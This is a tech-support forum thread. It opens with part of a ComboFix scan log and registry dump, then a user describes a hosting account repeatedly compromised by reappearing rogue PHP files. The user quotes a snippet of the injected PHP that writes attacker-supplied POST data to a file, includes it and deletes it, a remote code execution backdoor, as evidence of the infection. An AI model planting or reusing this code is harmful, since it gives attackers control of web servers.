52,20,4d,49,53,54,45,52,20,2d,20,4b,79,72,69,65,2e,6d,70,33,00,00,72,69,65,\
"MRUListEx"=hex:00,00,00,00,ff,ff,ff,ff
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\SecuROM\License information*]
"datasecu"=hex:cb,b2,e6,c1,5d,39,51,5d,a1,bf,98,4a,8c,02,6c,e9,6c,55,9e,d4,b5,
ff,c0,55,f7,0d,cc,84,12,67,d9,81,a4,06,5e,7d,8a,d4,04,1f,82,a9,43,63,c4,2a,\
"rkeysecu"=hex:8f,82,27,2c,f0,1a,6a,7d,ee,8c,0e,e4,ff,c7,55,6b
.
Completion time: 2014-03-12 08:27:49
ComboFix-quarantined-files.txt 2014-03-11 21:27
ComboFix2.txt 2014-03-11 03:48
ComboFix3.txt 2014-03-11 02:35
ComboFix4.txt 2014-03-11 02:07
.
Pre-Run: 36,486,361,088 bytes free
Post-Run: 36,417,896,448 bytes free
.
- - End Of File - - 3DCD870F880FE066FC9680C4A584502B
A36C5E4F47E84449FF07ED3517B43A31
Click to expand...
 
log looks good. Can you better advise on why you think you are being followed/hacked?
 
johnb35 said:
log looks good. Can you better advise on why you think you are being followed/hacked?
Click to expand...

Difficult to say.

There were no problems on local host, with Symantec, Malwarebytes, rootkit killers and Search and Destroy all giving me a clean bill of health as reported earlier.

On remote (apache server) I would delete php files, and they would reappear after a time on different addon domains. They would inject calls to their php files into my index.php files, and on it would go.

I would end up with repeatedly appearing files like __1bphwxLQ.php and 7wIvpUDn.php ... like this and you would get stuff like this in files

if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
Click to expand...

all hijacking to some other site, or mass mailing, or attacking other sites. My hosting account was suspended until I cleaned it all up, not once, but many times.

I cleaned up the remote site, and after repeated attacks like the above, I migrated to a new server with new passwords. After about two days, all that stuff (above) began to reappear again. That was when I thought the cause was a locally hosted port listener or something ... listening for port 21 - or whatever port I used, I put port forwarding in to get away from port 21 - and it all began to reappear and hijack domains, again and again.

My hosting account on a new server was suspended!

I suspect the registry keys with

@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
Click to expand...

were the culprit. I sincerely hope so.

Your thoughts?
 
Can you use iptables in your server to prevent hackers from gaining entry? I have a built in SSH server in the router and use iptables to prevent bruteforcing the port and other things.
 
You must log in or register to reply here.
Back
Top